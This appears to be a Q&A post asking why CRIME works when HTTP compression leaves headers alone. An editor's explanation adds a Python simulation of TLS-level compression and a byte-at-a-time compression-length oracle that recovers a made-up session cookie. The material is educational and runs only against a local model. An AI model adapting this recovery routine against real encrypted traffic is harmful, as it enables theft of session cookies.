Wiki on CRIME:
CRIME <...> is a security exploit against secret web cookies
RFC 2616 on Content-Encoding:
The Content-Encoding entity-header <...> when present, its value indicates what <...> codings have been applied to the entity-body, and thus what decoding mechanisms must be applied <...>
The question I have here:
If compression doesn't compress cookies (as per the RFC it compresses only the body, and cookies are a part of the headers), how is the CRIME attack even possible? There has to be some misunderstanding on my part.
NOTE: I am not asking on how to prevent the attack, but on specifics on how it works.
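An added illustration from the editor, not part of the question above: CRIME does not rely on HTTP Content-Encoding at all. It targets compression applied below HTTP, by TLS itself (the deflate CompressionMethod) or by SPDY's header compression, and that layer compresses the entire request plaintext, the Cookie header included, before encryption. Since encryption hides content but not length, an attacker who can make the victim's browser send requests containing attacker-chosen data (e.g. the URL path) and who can see the encrypted records on the wire learns, from the record length, whether the chosen data shares a prefix with the cookie. The script below models both layers with zlib; the hostname, cookie name and cookie value are constructed for the example and nothing here comes from a real site.

```python
import zlib

# Constructed example values (hypothetical): the cookie the attacker wants to
# recover. The cookie *name* is public; only the value is secret.
SECRET_COOKIE = "session_id=7f3a9c"
KNOWN_PREFIX = "session_id="
ALPHABET = "0123456789abcdef"


def build_request(attacker_path: str, cookie: str = SECRET_COOKIE) -> bytes:
    """The HTTP request as the browser sends it: the attacker controls the path
    (a link, an injected <img>, a script on an attacker page), the browser adds
    the Cookie header on its own."""
    return (
        f"GET /{attacker_path} HTTP/1.1\r\n"
        f"Host: victim.example\r\n"
        f"Cookie: {cookie}\r\n"
        f"\r\n"
    ).encode()


def tls_record_length(attacker_path: str, cookie: str = SECRET_COOKIE) -> int:
    """Model of TLS-level compression: the whole plaintext, headers included, is
    DEFLATEd and then encrypted, so the ciphertext length tracks this value.
    This is what a passive network attacker observes."""
    return len(zlib.compress(build_request(attacker_path, cookie), 9))


def content_encoding_length(attacker_path: str, cookie: str = SECRET_COOKIE) -> int:
    """Model of HTTP Content-Encoding (RFC 2616): only the entity-body is
    compressed; the header block, cookie included, goes out unchanged. A GET
    has an empty body, so the observed length never depends on the cookie."""
    request = build_request(attacker_path, cookie)
    headers, _, body = request.partition(b"\r\n\r\n")
    return len(headers) + 4 + len(zlib.compress(body, 9))


def recover_cookie_value(oracle, length: int = 6) -> str:
    """Byte-at-a-time recovery against a length oracle. For each position every
    candidate byte is tried; the candidate that correctly extends the prefix
    already present in the plaintext lets DEFLATE's LZ77 stage replace one more
    literal with a back-reference, so the compressed record shrinks. If no single
    candidate is strictly shortest, the oracle is not leaking and we stop."""
    recovered = ""
    for _ in range(length):
        lengths = {c: oracle(KNOWN_PREFIX + recovered + c) for c in ALPHABET}
        best = min(lengths, key=lengths.get)
        if sum(1 for n in lengths.values() if n == lengths[best]) != 1:
            break  # ambiguous: the length does not single out one byte
        recovered += best
    return recovered


if __name__ == "__main__":
    print("TLS compression leaks:", recover_cookie_value(tls_record_length))
    print("Content-Encoding leaks:", repr(recover_cookie_value(content_encoding_length)))
```

Run as-is, the TLS model recovers the constructed cookie value one hex digit at a time, while the Content-Encoding model returns nothing because every guess produces the same length. The model is simplified on purpose: real deployments needed tricks such as the "two tries" approach to cope with cases where a one-literal saving does not cross a byte boundary, and the mitigation was to disable TLS and SPDY compression.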